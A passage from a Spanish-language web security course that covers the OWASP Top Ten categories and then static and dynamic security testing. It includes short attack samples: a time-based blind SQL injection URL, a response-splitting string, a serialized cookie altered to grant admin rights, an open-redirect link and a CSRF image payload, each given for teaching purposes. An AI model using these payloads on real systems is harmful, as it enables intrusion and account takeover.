En la siguiente consulta, en el caso de existir la tabla «users» y tener algún registro, se va a
ralentizar la respuesta de la página web por diez segundos. Si la respuesta se obtiene en
un período inferior se puede inferir que la tabla «users» existe y tiene algún registro.
http://servidor/prueba?id=1; if (exists(select * from users)) waitfor
delay '0:0:10'-
DEFENSA SQLI
Para la defensa ante SQLI ha de efectuarse validación de entrada y utilizar consultas
parametrizadas que incorporan los lenguajes de desarrollo utilizando conceptos de
desarrollo seguro, validando los campos de entrada a la aplicación asociada a la base
de datos y escapando cualquier carácter que pueda incurrir en SQLI.
Los fabricantes, proyectos como OWASP (Owasp cheat sheets), WASC, etc., ofrecen
mejores prácticas para el desarrollo seguro y dan recomendaciones claras y precisas
para evitar la inyección de código. ESAPI es una colección gratis y abierta de código
de implementación de funciones de seguridad y de validación de entradas, que un
desarrollador necesita para construir una aplicación web segura.
Se pueden usar solo las interfases y construir su propia implementación utilizando la
infraestructura de su compañía y se puede usar la implementación de referencia como
un punto de inicio. En concepto, la API es independiente del lenguaje. Los primeros
entregables del proyecto son una API Java y una referencia de implementación Java.
Existen versiones ESAPI en.NET, PHP, PYTHON, COLD FUSION y NODEJS.
Los atacantes intentan realizar ingeniera inversa y extraer información de las aplicaciones
sobre la base de los mensajes o tratamientos de error. Es importante que se controlen
absolutamente todas las posibilidades que puedan generar error en cualquier

procedimiento por parte del programador. Para cada acción de error se debe realizar un
tratamiento seguro y evitar dar información útil a un posible atacante. Es recomendable
que los errores, tanto los de aplicación como los de servidor, se auditen, pues puede
representar un fallo en el funcionamiento normal del programa o un intento de ataque.
Se puede afirmar que casi el cien por ciento de los atacantes a un sistema van a generar
algún error en la aplicación.
HTTP RESPONSE SPLITTING CWE 113

Otras vulnerabilidades que se pueden presentar en el protocolo HTTP es la vulnerabilidad
http response spliting que consiste en incluir caracteres \r\n de retorno de carro y de línea
para generar una respuesta doble (Acunetix, 2020) que se ejecutarán en el navegador
del usuario permitiendo lanzar otros ataques como XSS:
Ilustración 1. Ejemplo de HTTP Response Splitting. Fuente: Chess y west, 2007.
Si el atacante suministra una cadena como Wiley Hacker\r\n\r\nHTTP/1.1 200 OK\

r\n..., la respuesta se convierte en doble permitiendo inyectar código HTML:
Ilustración 2. Ejemplo 2 de HTTP Response Splitting. Fuente: Chess y west, 2007.
Otras vulnerabilidades similares de la categoría de inyección son LDAP injection (CWE 90),
que permite inyección de código en directorios LDAP o Command Injection (CWE 78), que
permite ejecución de comandos en el servidor de aplicaciones.
A4:2021: DISEÑO INSEGURO

Es una categoría enfocada en los riesgos relacionados con los fallos de diseño y
arquitectura que requiere realizar un modelado de amenazas, usar patrones de diseño
seguros y arquitecturas de referencia. Entre las vulnerabilidades más comunes (CWE) se
encuentran:

Tabla 1 Principales vulnerabilidades de A4:2021: diseño inseguro.
A5: 2021: CONFIGURACIÓN DE SEGURIDAD INCORRECTA

Algunas de las principales vulnerabilidades que caen en esta categoría son las siguientes:
Tabla 2 Principales vulnerabilidades de A5: 2021.
Cualquier parámetro mal configurado, menos restrictivo, que afecte a la seguridad de

un servidor de aplicaciones (aplicación, protocolo, base de datos, etc.), supone una
vulnerabilidad. Se van a describir dos de ellas que son importantes y que pueden debilitar
la autenticación o gestión de sesiones de una aplicación.
El uso de un algoritmo de hash produce un valor de hash que puede utilizarse para
determinar la entrada original (CWE 328) o para encontrar una entrada que pueda
producir el mismo hash de manera más eficiente que las técnicas de fuerza bruta. Esta
vulnerabilidad es especialmente peligrosa cuando el hash se utiliza en algoritmos de
seguridad que requieren que la propiedad unidireccional se mantenga.
Por ejemplo, si un sistema de autenticación toma una contraseña entrante y genera
un hash, y luego compara ese con otro que tiene almacenado en su base de datos de
autenticación, entonces la capacidad de crear una colisión podría permitir a un atacante
proporcionar una contraseña alternativa que produzca el mismo hash del objetivo,
eludiendo la autenticación.
El programa informático utiliza números o valores que son insuficientemente aleatorios
en un contexto de seguridad que depende de números impredecibles (CWE 330). Cuando
se generan valores previsibles en un contexto que requiere imprevisibilidad, puede ser
posible que un atacante adivine el siguiente valor que se generará (por ejemplo, un

identificador de sesión) y utilice esa suposición para hacerse pasar por otro usuario o
acceder a información sensible. Hay que usar funciones criptográficas de generación
de números aleatorios no estadísticas:
Ilustración 3 CWE 330.
Este código utiliza la función Random.nextInt() para generar identificadores «únicos» para
las páginas de recibos que genera. Debido a que Random.nextInt() es un PRNG estadístico,
es fácil para un atacante adivinar las cadenas que genera. Aunque el diseño subyacente
del sistema de recibos también es defectuoso, sería más seguro si utilizara un generador
de números aleatorios que no produjera identificadores de recibos predecibles, como
un PRNG criptográfico. Si un atacante puede adivinar (o sabe) la semilla (CWE 336),
entonces puede ser capaz de determinar los números aleatorios que se producirán a
partir del PRNG.
Si se utiliza un hash criptográfico unidireccional contra una entrada que no debería
ser reversible, como una contraseña, pero el software no utiliza una salt (prefifo o sufijo
aleatorio) como parte de la entrada (CWE 759). Esto facilita a los atacantes el precálculo
del valor de hash usando técnicas de ataque de diccionario como las rainbow tables.
XML EXTERNAL ENTITIES CWE 611

Los ataques de entidades externas de XML (CWE 611) se benefician de una función de
XML para crear documentos de forma dinámica en el momento de procesamiento. Una
entidad XML permite la inclusión de datos de forma dinámica desde un recurso dado. Las
entidades externas le permiten a un documento XML incluir datos desde un URI externo.
A menos que se configure de otra forma, estas entidades fuerzan al analizador de XML a
acceder al recurso que especifica el URI, como por ejemplo un archivo del equipo local o
de un sistema remoto.
Este comportamiento expone la aplicación a ataques de entidades externas (XXE) de XML,
los cuales se pueden utilizar para llevar a cabo una denegación de servicio del sistema
local, obtener acceso no autorizado a archivos del equipo local, explorar equipos remotos
y denegar el servicio de sistemas remotos. A continuación, se muestra un ejemplo de un
ataque XXE.

Ilustración 4 Acceso a recurso local del servidor mediante XXE.
A6: 2021: COMPONENTES VULNERABLES Y DESACTUALIZADOS

Tabla 3 Algunas vulnerabilidades de A6: 2021.
El uso de algoritmos criptográficos obsoletos, longitudes de clave inadecuadas, débiles

números aleatorios o el hecho de introducir un prefijo/sufijo (salt) predecible para dificultar
los ataques de fuerza bruta basados en diccionario sobre hashes de contraseñas son
vulnerabilidades conocidas de antemano que se pueden evitar utilizando versiones más
actuales, longitudes de clave adecuadas, por ejemplo.
Cualquier vulnerabilidad pública conocida CVE para la que exista un parche y este no
se aplique es una posibilidad clara de ataque, ya que como se menciona, es publica
y los atacantes pueden relacionarlas con las versiones de los navegadores, servidores
de aplicaciones y gestores de bases de datos que se están usando. Cualquier software
que se instala en cualquier capa de la aplicación, debe investigarse para comprobar
en Internet las vulnerabilidades públicas conocidas CVE relativas y descargar el parche
correspondiente si lo hubiera.
Por ejemplo, se puede consultar en tiempo real las vulnerabilidades actuales del marco

de trabajo Spring en la referencia (CVE-details, 2020).
Ilustración 5 . CVE, spring frameweork. Fuente: página de CVE details, s.f.
A7:2021: AUTENTICACIÓN E IDENTIFICACIÓN DÉBILES

Tabla 4 Principales vulnerabilidades de A7:2021: autenticación e identificación débiles.
Las vulnerabilidades CWE 256, 257 se refieren a almacenar las contraseñas en texto
claro o en un formato recuperable como BASE64 o similar, se deben almacenar el HASH

de las contraseñas con algoritmos como SHA-512.
Las vulnerabilidades CWE 259, 321, 529 se dan cuando se implementa la contraseña en el
código fuente, lo cual no permite establecer ninguna política robusta de contraseñas, ya
que solo se podría cambiar cuando se recopile la aplicación. En muchos sistemas, existe
una cuenta de administración predeterminada que se establece con una contraseña
también predeterminada y que se codifica en el programa o dispositivo.
Esta contraseña codificada es la misma para cada dispositivo o sistema de este
tipo y, por lo general, los usuarios finales no suelen cambiarla ni la desactivarla. Si un
usuario malicioso se encuentra con un dispositivo de este tipo, simplemente se busca la
contraseña predeterminada (que es de libre acceso y pública en Internet) y se accede
con un acceso completo.
En los sistemas que se autentican con un servicio deback-end, las contraseñas hardcoded
en el código fuente requieren que el servicio de back-end utilice una que puede
descubrirse fácilmente. Los sistemas del lado del cliente con contraseñas codificadas
son una amenaza, ya que la extracción de una contraseña de un binario es sumamente
sencilla.
No se debe utilizar la cabecera REFERER (CWE 293) de las peticiones HTTP para
autenticación, ya que es un valor fijo que normalmente es el nombre del servidor web,
va en todas las peticiones y se puede sniffar si no está cifrada, aunque en muchos casos
se use una conexión TLS cifrada. No se debe utilizar autenticación en el lado cliente de
forma aislada (CWE 603), siempre debe autenticar el lado servidor y de forma adicional
también en el lado servidor.
El no cifrar credenciales en tránsito, de autenticación o de sesión (CWE 523) posibilita
ataques de repetición. Hay que cifrar estos datos a nivel de aplicación y/o a nivel de
transporte con Transport Socket Layer (TLS) en su última versión disponible para evitar
vulnerabilidades.
En cuanto al manejo de sesiones, se deben establecer tiempos máximos de expiración
absolutos y de inactividad (613) y se deben configurar los parámetros secure y httponly
en las propiedades de las cookies que alojan identificadores de sesión (CWE 614). Además,
solo se debe generar el ID de sesion una vez el usuario se haya autenticado correctamente.
Si se genera un ID de sesion al acceder a la aplicación antes de la autenticación se estará
expuesto al ataque sesion fixation (CWE 384):
• Identificar el mecanismo de intercambio del ID de sesión.

• Obtener un ID válido (pre/post autenticación).
• Fijar el ID a posibles víctimas mediante el envío de un correo electrónico que
contiene un enlace diseñado para que la víctima se autentique con un ID de
sesión específico.
• La víctima se autentica con sus credenciales.
• El atacante con mismo id de sesión obtiene credenciales.
• Analizar la respuesta tras la autenticación.

Ilustración 6 Ataque de fijación de sesión. Fuente: Ballester, 2007.
Los ataques de entidades externas de XML se benefician de una de sus funciones para
crear documentos de forma dinámica en el momento de procesamiento. Una entidad XML
permite la inclusión de datos de forma dinámica desde un recurso dado. Las entidades
externas permiten a un documento XML incluir datos desde un URI externo. A menos que
se configure de otra forma, las entidades externas fuerzan al analizador de XML a acceder
al recurso que especifica el URI, como por ejemplo un archivo del equipo local o de un
sistema remoto.
Este comportamiento expone la aplicación a ataques de entidades externas (XXE) de XML,
los cuales se pueden utilizar para llevar a cabo una denegación de servicio del sistema
local, obtener acceso no autorizado a archivos del equipo local, explorar equipos remotos
y denegar el servicio de sistemas remotos. A continuación, en la Figura 16, se muestra un
ejemplo de un ataque XXE:
Ilustración 7 Acceso a recurso local del servidor mediante XXE.
A8: 2021: VULNERABILIDADES DE INTEGRIDAD DE DATOS Y

SOFTWARE
La serialización es el proceso de codificación de un objeto (como un archivo o buffer de
memoria) en una secuencia de bytes para almacenarlo o transmitirlo a un dispositivo o
base de datos en un formato legible como ARRAY JAVASCRIPT, JSON o XML (entre otros).
La vulnerabilidad de seguridad de deserialización que se analiza en el Top 10, explica que
los datos serializados (que el atacante envía al servidor de consumo de servicios) hacen
que al momento de deserializar se ejecute un código arbitrario (malicioso).

El riesgo de esta falla de seguridad es que el atacante, gracias al código malicioso, pueda
tomar control del servidor remotamente u obtener información de este. En específico, los
ataques que se podrían sufrir serían los siguientes:
• Ataques relacionados con la estructura de datos y objetos donde el
atacante modifica la lógica de la aplicación o logra una ejecución remota de
código si existen clases disponibles para la aplicación que puedan cambiar
el comportamiento durante o después de la deserialización.
• Ataques típicos de manipulación de datos, como los relacionados con el
control de acceso en los que se utilizan estructuras de datos existentes, pero
que modifica su contenido.
Ejemplo
n foro PHP utiliza serialización de objetos PHP para almacenar una cookie,
conteniendo el ID, rol, hash de la contraseña y otros estados del usuario:
a:4: {i:0;i:132;i:1;s:7:"Mallory";i:2;s:4:"user";i:3;s:32:&quo
t;b6a8b3bea87fe0e05022f8f3c88bc960";}
Un atacante modifica el objeto serializado para darse a sí mismo los privilegios
de administrador:
a:4: {i:0;i:1;i:1;s:5:"Alice";i:2;s:5:"admin";i:3;s:32:"b
6a8b3bea87fe0e05022f8f3c88bc960";}
Esta vulnerabilidad es una de las más actuales, debido al consumo de servicios que
realizan las apps de celulares (IOS, Android) y las webs más modernas (Vue.js, Node.js,
laravel, ruby on rails).
RECOMENDACIONES
• Debe realizarse un parseo validado del formato del serializado antes de
deserializar.
• Integrar firmas digitales a los objetos serializados con el fin de detectar
modificación no autorizada.
• Aislar el código que realiza la deserialización, de modo que se ejecute en un
entorno con los mínimos privilegios posibles, en este caso, el atacante no
podría tener muchos privilegios si ingresa al servidor.
• Monitorizar las conexiones de red entrantes y salientes desde contenedores o
servidores que utilicen funcionalidades de deserialización.
A9: 2021: REGISTRO Y MONITORIZACIÓN INSUFICIENTES

El registro y la monitorización insuficientes son la causa de casi todos los incidentes
importantes. El número de días (de media) que lleva descubrir una violación hace pensar
que, o no se están utilizando suficientes herramientas de seguridad o que las alertas que
generan no se toman lo suficientemente en serio. No hay un día en el que no se conozca
un nuevo caso de una empresa que se ha dado cuenta de que su red y sus sistemas
llevan comprometidas semanas, meses o incluso años.

La monitorización continua es uno de los pilares fundamentales para la seguridad de
las aplicacionesonline. Es imprescindible establecer un procedimiento de monitorización
continúa marcando responsabilidades para una eficaz detección temprana y tratamiento
rápido y adecuado de cualquier incidente de seguridad que pueda tener la aplicación.
Una buena práctica es ayudarse de Firewalls de Aplicaciones Web (WAF), Sistemas
de Detección/Protección de Intrusiones (IDS/IPS) y Sistemas de Gestión de Eventos de
Seguridad (SIEM), que permiten la captura de acciones maliciosas y su centralización y
categorización para mejorar la actividad de monitorización continua.
A10: 2021: ROBO DE PETICIONES DEL LADO DEL SERVIDOR. SSRF

(SERVER SIDE REQUEST FORGERY)
Las vulnerabilidades SSRF se producen cuando una aplicación web obtiene un recurso
remoto sin validar la URL proporcionada por el usuario. Esto permite que un atacante
coaccione a la aplicación para que envíe una solicitud manipulada a un destino
inesperado, incluso cuando está protegida por un cortafuegos, una VPN u otro tipo de
lista de control de acceso en la red (ACL).
La gravedad de la SSRF es cada vez mayor debido a los servicios en la nube y a la
complejidad de las arquitecturas. Es necesario sanear y validar todos los datos de entrada
proporcionados por el cliente. Los atacantes pueden utilizar SSRF para hacer peticiones a
otros recursos internos a los que el servidor web tiene acceso, que no están disponibles
públicamente. Por ejemplo, pueden acceder a los metadatos de instancias de servicios
en la nube como AWS/Amazon EC2 y OpenStack. Un atacante puede incluso ser creativo
con SSRF y ejecutar escaneos de puertos en IP internas.
Ilustración 8 Server Side Request Forgery

7.2. OWASP Top Ten 2013: otras vulnerabilidades
importantes
Es importante tener en cuenta otras vulnerabilidades frecuentes y peligrosas integradas
en la anterior versión de OWASP Top Ten del año 2013, como son las redirecciones a otros
sitios no validadas y las falsificaciones de peticiones en sitios cruzados.
REDIRECCIONES NO VALIDADAS CWE 601

Las redirecciones y reenvíos no validados son posibles cuando una aplicación web
acepta entradas no confiables que podrían causar que se redirija la solicitud a una URL
contenida dentro de una entrada no confiable. Al modificar la entrada de una URL no
fiable a un sitio malicioso, un atacante puede lanzar con éxito una estafa de phishing y
robar las credenciales del usuario.
Dado que el nombre del servidor en el enlace modificado es idéntico al del sitio original,
los intentos de phishing pueden tener un aspecto más fiable. Los ataques de redirección
y reenvío no validados también pueden utilizarse para crear maliciosamente una URL que
pase la comprobación de control de acceso de la aplicación y luego reenviar al atacante
funciones privilegiadas a las que normalmente no podría acceder. Por ejemplo:
The following Java code receives the URL from the parameter named url (GET or POST)
and redirects to that URL:
response.sendRedirect(request.getParameter("url"));
Si no se aplica ninguna validación, un usuario malintencionado podría crear un hipervínculo
para redirigir a sus usuarios a un sitio web malintencionado no validado, por ejemplo:
http://example.com/example.php?url=http://malicious.example.com
En el ejemplo anterior, el usuario ve el enlace que dirige al sitio de confianza original
(example.com) y no se da cuenta de la redirección que podría tener lugar.
FALSIFICACIÓN DE PETICIONES EN SITIOS CRUZADOS (CSRF) CWE

89
El siguiente es un ejemplo sencillo de cómo se puede abusar de la falsificación de
solicitudes en sitios cruzados (CSRF) en las solicitudes GET mediante el uso de la etiqueta
<img>:
<img src="http://example.com/changePassword.php/?
newPassword=attackerPassword">
Lo anterior es un ataque CSRF usando una petición HTTP GET. Si la víctima visita una
página web controlada por el atacante con la siguiente carga útil, el navegador enviará
una solicitud, que contiene la cookie, a la URL creada por el atacante. Las solicitudes GET,
sin embargo, no son el único método HTTP que puede utilizar un atacante.

Las solicitudes POST son igualmente susceptibles a la falsificación de solicitudes en
sitios cruzados (CSRF), sin embargo, un atacante tendrá que hacer uso de un poco de
JavaScript para enviar la solicitud POST. El siguiente es un ejemplo simple de cómo se
puede abusar de la CSRF utilizando solicitudes POST mediante el uso de una etiqueta
<iframe>. Este código sería cargado en iframe que se hace invisible para la víctima.
Ilustración 9 CSRF
La técnica de prevención más utilizada para los ataques de falsificación de peticiones

en sitios cruzados (CSRF) se conoce como token anti-CSRF, a veces llamado token
sincronizador o simplemente token CSRF. Cuando un usuario envía un formulario o
realiza alguna otra solicitud autenticada que requiere una cookie, se debe incluir un token
aleatorio en la solicitud. La aplicación web verificará entonces la existencia y la corrección
de este token antes de procesar la solicitud. Si el testigo falta o es incorrecto, la solicitud
puede ser rechazada.
Ilustración 10 Ejemplo de token anti-CSRF.
Se recomienda encarecidamente utilizar una biblioteca anti-CSRF existente (ESAPI, 2020),

bien probada y fiable. Dependiendo de su idioma y del marco de trabajo que elija, hay
varias bibliotecas de código abierto de alta calidad listas para usar. Las características
de un sistema anti-CSRF bien diseñado implican los siguientes atributos:
• El token anti-CSRF debe ser único para cada sesión de usuario.
• La sesión debería expirar automáticamente después de un tiempo adecuado.
• El token anti-CSRF debe ser un valor aleatorio criptográfico de longitud
significativa.
• El token anti-CSRF debe ser criptográficamente seguro, es decir, generado por
un fuerte algoritmo generador de números pseudoaleatorios (PRNG).
• El token anti-CSRF puede ser añadido como un campo oculto para formularios
o dentro de URL (solo es necesario si las peticiones GET causan cambios de
estado, es decir, las peticiones GET no son idempotentes).
• El servidor debe rechazar la acción solicitada si el token anti-CSRF falla la
validación.
Otra técnica es utilizar el atributo de las cookies SameSite. Una cookie siempre está
ligada a un dominio particular. Sin embargo, digamos que tienes un sitio web e incrustas
un vídeo de YouTube en él. Cuando un usuario que ha iniciado sesión en YouTube visita
su sitio, de forma predeterminada YouTube también recibe una solicitud. Esta incluye
información que proviene de su sitio e incluye las cookies de YouTube. Esto se denomina
contexto de terceros.
El atributo SameSite del encabezado Set-Cookie fue introducido como un borrador de
la IETF en abril de 2016 por Mike West de Google y Mark Goodwin de Mozilla. Este se envía
cuando se establece una cookie, por ejemplo:
Set-Cookie: my_cookie=1; SameSite=Strict
El atributo puede tener uno de los siguientes valores:
SameSite=strict
La cookie solo se envía si estás actualmente en el sitio para el que se ha establecido. Si
estás en otro sitio y haces clic en un enlace a un sitio para el que se ha establecido la
cookie, esta no se envía con la primera solicitud.
SameSite=Lax
L a cookie no se envía por el contenido incrustado, lo hará si se hace clic en un enlace a
un sitio para el que se ha establecido dicha cookie. Se envía solo con tipos de solicitud
seguros que no cambian de estado, por ejemplo, GET.

SameSite=None
La cookie se envía incluso para contenido incrustado. Hasta hace poco, este era también
el comportamiento actual de muchos navegadores si el atributo SameSite no estaba
establecido.
• Si el valor del atributo SameSite es inválido, la mayoría de los navegadores
asumen que no está establecido y, por lo tanto, aplican su configuración
predeterminada. Rowan Merewood de Google escribió un excelente artículo
explicando este mecanismo con más detalle.
• Las configuraciones SameSite=strict y SameSite=Lax protegen sus cookies
de ser utilizadas en ataques CSRF. Sin embargo, hacen que el rastreo sea
más difícil. Estas configuraciones deberían utilizarse para las cookies de
autenticación, pero no son buenas para el seguimiento de las utilizadas en la
publicidad.
7.3. Análisis de seguridad de las aplicaciones web

Para llevar a cabo un análisis de seguridad de una aplicación web, realizado con cualquier
método, se tiene que cubrir toda la superficie de ataque de la aplicación cubriendo todas
sus partes y capas después de su exhaustivo reconocimiento. El esquema de la Figura 2 de
Stuttard, (Stuttard, 2008) resume cómo tiene que ser un análisis de seguridad realizando
test funcionales de seguridad y test de penetración en todas las capas de la aplicación:
Ilustración 11 Test de una aplicación web.

Si se consideran todas las fases del ciclo de vida de desarrollo seguro de una aplicación
web hay que tener en cuenta el análisis de seguridad del código fuente.
En la Figura 3 se muestran los tipos de análisis de seguridad y de herramientas de
seguridad relacionadas a emplear. Concretamente, en la fase de desarrollo se revisa la
seguridad del código fuente con herramientas de análisis estático (SAST) y en la fase de
pruebas se lleva a cabo el test funcional de seguridad que prueba cada dimensión de la
aplicación (autenticación, sesiones, autorización, registro, configuraciones de seguridad,
etc.). Por último, tiene lugar el test de penetración con herramientas de análisis dinámico
de caja negra o gris (DAST) y con herramientas interactivas de análisis en tiempo real
(IAST).
Ilustración 12 Test de la seguridad de una aplicación web y SSDLC.
La OWASP testing guide 4.1 es una guía fundamental que se puede usar para llevar a cabo
cada uno de los distintos tipos de análisis y actividades de seguridad que marca el ciclo
de vida de desarrollo seguro de software (SSDLC) para analizar cada parte o capa de la
aplicación web. Este enfoque iterativo en el marco del SSDLC, requiere la correlación de
los resultados de detección de vulnerabilidades de todos los tipos de análisis.
7.4. Análisis de seguridad estático de código fuente

Según los informes de Veracode volumen 9 y 10 (Veracode, 2019; Veracode 2020),
solamente el 12,4 % del software se desarrolla internamente y es posible que en muchos
casos no se disponga del código fuente para poder analizarlo y disponer de herramientas
que analicen el código ejecutable y solucionen el problema.

Ilustración 13 Tipos de suministradores de software.
Se dispone de herramientas del tipo de caja blanca de análisis estático que analizan e l
código fuente y el ejecutable, según sea el caso. La diferencia entre ellas básicamente se
encuentra en que las de código ejecutable tienen primero que hacer un desensamblado
para extraer el código fuente y, posteriormente, actúan como el otro tipo de herramientas
estáticas de código fuente, es decir, tienen una etapa previa de conversión de código
ejecutable en el código fuente correspondiente.
Por tanto, las consideraciones y el análisis de las de código fuente servirán también
para las de código ejecutable y solo se comentarán para estas las particularidades y
problemas que tiene la etapa previa de desensamblado para obtener el código fuente a
partir del código ejecutable.
Como menciona Livshits (2006), las herramientas de tipo SAST toman como entrada el
código fuente y lo trasforman partiendo de las representaciones intermedias (árbol de
análisis sintáctico) resultantes de la fase compilación a un modelo del código fuente
y, a continuación, lo analizan contra una serie de reglas definidas en las herramientas
para generar los informes de error correspondientes. Este conjunto de reglas se puede
aumentar en muchos casos por parte del usuario que puede definir las suyas propias
para adaptarlas a las particularidades de la aplicación que se está analizando. Un
ejemplo de lenguaje de especificación de reglas es PQL (program query language) para
la definición de defectos de seguridad para lenguaje Java.
Este tipo de herramientas parten con un problema debido a que el hecho de determinar
si un programa alcanza su estado final o no es un problema indecidible (Sipser, 2006). En
este contexto, un falso positivo es un problema descubierto en un programa cuando en
realidad no existe ninguno. La noción de utilizar un algoritmo para analizar otro es parte
de los orígenes de la computación.
A pesar de este problema, tal y como dice McGraw (2006), estas herramientas son
consideradas como una actividad muy importante de seguridad dentro de un SSDLC como
también se desprende de las estadísticas de vulnerabilidades referidas anteriormente y
contenidas en el informe de seguridad, volumen 9 de Veracode.

CARACTERÍSTICAS
Las herramientas de análisis estático comprueban todo el código a fondo y
coherentemente sin ninguna tendencia, que a veces los programadores según su criterio
podrían tener sobre algunas de las partes del código que pudieran ser más interesantes
desde una perspectiva de seguridad o que pudieran ser más fáciles para realizar las
pruebas dinámicas.
Un análisis valioso debe ser lo más imparcial posible. Examinar el código totalmente
y a fondo supone una buena realimentación en el conocimiento de la aplicación
ahondando más en el conocimiento de la seguridad de la aplicación.
Examinando el código en sí mismo, las herramientas de análisis estático pueden indicar la
causa de origen de un problema de seguridad y no solamente uno de sus síntomas. Esto es
importante para asegurarse de que las vulnerabilidades son corregidas correctamente.
El análisis estático puede encontrar errores tempranamente en la fase de implementación
y desarrollo antes de que el programa sea ejecutado por primera vez. El encuentro de
un error de este tipo no solo reduce el coste de arreglarlo, sino que además un ciclo de
realimentación rápido puede ayudar a dirigir el trabajo de un programador. Este tiene la
oportunidad de corregir errores de los que antes no era consciente. Los escenarios de
ataque y la información sobre el código usados por una herramienta de análisis estático
actúan como medio de transferencia de conocimiento.
Se ha comentado el problema que tienen en cuanto al reporte de falsos positivos. Esto
se puede arreglar en gran medida mediante una auditoría posterior, para lo cual la
información de trace que proporcionan las herramientas en muchos de los casos hace
que esta tarea no sea tan complicada a la vez que aporta para la persona que la realiza
una realimentación de conocimiento de la aplicación en su totalidad. La clasificación
por grado de criticidad de las vulnerabilidades reportadas también supone una ayuda
para esta auditoría posterior.
Los falsos positivos son seguramente indeseables, pero desde una perspectiva de
seguridad, los falsos negativos (defecto no descubierto) son mucho peores. Con un
falso negativo, un problema existe en el programa, pero la herramienta no lo detecta.
Según Stuttard (2008), la penitencia por un falso positivo es la cantidad de tiempo gastada
repasando el resultado. La penitencia por un falso negativo es mucho mayor. No solo se
paga el precio asociado por tener una vulnerabilidad en el código, se vive con un sentido
falso de seguridad que se deriva del hecho de que la herramienta hizo parecer que todo
era correcto. Todas las herramientas de análisis estático de código producen algunos
falsos positivos o falsos negativos. La mayoría de ellas producen ambos. El balance
que una herramienta efectúa entre falsos positivos y falsos negativos es normalmente
indicativo del propósito de la herramienta.
Las herramientas SAST, por lo general, intentan producir un número bajo de falsos positivos
y están más dispuestas a aceptar falsos negativos. La penitencia por las vulnerabilidades

de seguridad pasadas por alto es elevada; por ello, otras herramientas SAST siguen el
enfoque de reducir al mínimo los falsos negativos a costa de tener más falsos positivos
que posteriormente se puedan descartar en la auditoría final de resultados.
La existencia de falsos positivos y falsos negativos obliga a realizar una auditoría posterior
de los informes de la herramienta que permitan eliminar los primeros y encontrar los
segundos (bastante más complicado). Esto implica una adecuada formación en
los defectos que se pueden cometer en el código de un determinado lenguaje de
programación que puede ser más o menos amigable en función de las facilidades de
trace del error que proporcione una determinada herramienta.
Fortify SCA, Coverity, CxSAST, Xanitizer o Klocwork son buenos ejemplos de herramientas
que suministran una muy buena información para, sobre todo, eliminar falsos positivos.
ARQUITECTURA
Las herramientas estáticas cogen como entrada el código fuente y lo trasforman
generando representaciones intermedias o modelos del código fuente según el caso y,
a continuación, lo analizan contra una serie de reglas definidas en las herramientas, las
cuales pueden realizar algunos o todos estos análisis:
• Análisis léxico, sintáctico y semántico como cualquier compilador.

• Análisis intraprocedural o local (dentro de cada función) del flujo de control y
de los datos. Puede emplear técnicas o algoritmos como: métodos formales,
interpretación abstracta (Fromherz et al. 2018), satisfacción booleana (Biere et
al. 2018) o model checking (Beyer et al. 2018).
• Análisis global o interprocedural de llamadas entre funciones y flujo de los
datos: context-sensitive (determinación del contexto de una función cuando
es llamada), path sensitive (explora las rutas basado en información sobre
el flujo de control), path insensitive (explora todas las rutas, es muy costoso)
y basado en function summaries (utilización de resúmenes del contexto de
llamada de las funciones. Es más flexible que la anterior, puede ser más o
menos impreciso).
• El análisis global puede utilizar algoritmos como: SAT solvers (Biere et al. 2018),
theorem provers (Khan et al. 2019) o model checking (Beyer et al. 2018).
El esquema de una herramienta SAST genérica se puede ver en la Figura 5 donde se

evalúa la eficacia de nueve herramientas de análisis de seguridad del código fuente
tanto comerciales como de open source. Estas fabrican un modelo del código que se
analiza frente a las reglas de seguridad que caracterizan las vulnerabilidades para
detectar apariciones de vulnerabilidades en el modelo y producir resultados.

Ilustración 14 Arquitectura herramientas SAST
Estas herramientas tienen un paso previo dedesensamblado del código ejecutable. Una
vez obtenido, analizan el código fuente conseguido de la misma forma que las comentadas
anteriormente y, por tanto, se van a tratar principalmente las particularidades que tiene
el desensamblaje del código ejecutable como paso previo al análisis.
Estas aproximaciones analizan directamente el código máquina a partir de su
simplificación para construir un diagrama de control de flujo y de llamadas.
En lo referente a aplicaciones web existen varias implementaciones comerciales para
diversos lenguajes y plataformas como el servicio SaaS (software as a service) on demand
de la empresa Veracode. Sus servicios están disponibles para J2EE, C/C++,.NET, C#, PHP,
Coldfusion. FindSecuritybugs es una herramienta de este tipo de open source disponible
para lenguaje Java.
7.5. Análisis de seguridad funcional y dinámico

En la fase de despliegue o de pruebas se debe llevar a cabo un reconocimiento de las
capas de la aplicación usando la información de retroalimentación de las actividades
de fases anteriores, como el modelado de amenazas, la derivación de requisitos de
seguridad y la revisión de seguridad del código fuente.
Seguidamente, se hace un test funcional de seguridad de la aplicación usando
herramientas de análisis dinámico de caja negra o gris (DAST) y herramientas de análisis
dinámico de caja blanca (IAST). Las herramientas de tipo IAST necesitan la interacción
con la aplicación web para poder realizar su análisis de vulnerabilidades, esta interacción
puede ser manual o se puede usar un crawler y la fase de scan activo de una herramienta
de tipo DAST.
Posteriormente, en la fase de auditoría de resultados de vulnerabilidades encontradas, se
deben realizar comprobaciones manuales siguiendo los pasos que contiene la guía de
test versión 4.1 de OWASP Foundation, Testing Guide OWASAP (2020) donde cada paso es
un enlace al contenido de la propia guía.

Accede al índice de la guía para ver el contenido a través de la sección A fondo.
HERRAMIENTAS DE ANÁLISIS DINÁMICO (DAST)

Las herramientas de análisis dinámico de caja negra o gris (DAST) analizan una aplicación
utilizando la herramienta contra la aplicación en ejecución efectuando un test de
penetración e intentando cubrir toda la superficie de ataque (todas las entradas posibles
a la aplicación) para descubrir las vulnerabilidades que puedan existir. Como ejemplo de
este tipo de herramientas para aplicaciones web se encuentran Webinspect, OWASP Zap
o Burp Suite.
Este tipo de herramientas dentro del mundo de las aplicaciones web se denominan
Escáneres semiautomáticos de vulnerabilidades de aplicaciones web. Un escáner
automático de vulnerabilidades actúa como se muestra en la Figura 6. Se interpone entre
el administrador de la herramienta y la aplicación web para lanzar ataques contra la
aplicación, efectuando un test de penetración, inyectando datos y código maligno para
detectar las vulnerabilidades.
Ilustración 15 Dinámica de un escáner automático de vulnerabilidades. Fuente: adaptado de Souppaya y Scarfone, 2008.
Cubrir toda la superficie de ataque de la aplicación es difícil, el grado en el que esto se

consigue determina también el de la eficacia de la herramienta. Es difícil porque hay que
probar todas las entradas a la aplicación y con todos los roles de usuario, cada parámetro
de cada solicitud y cada respuesta para encontrar el patrón de una vulnerabilidad.
Hay que entender las posibilidades y debilidades de un escáner, conocer la
herramienta para sacar el mejor partido posible interpretando sus resultados. Los
escáneres semiautomáticos tienen sus limitaciones y pueden detectar un conjunto de
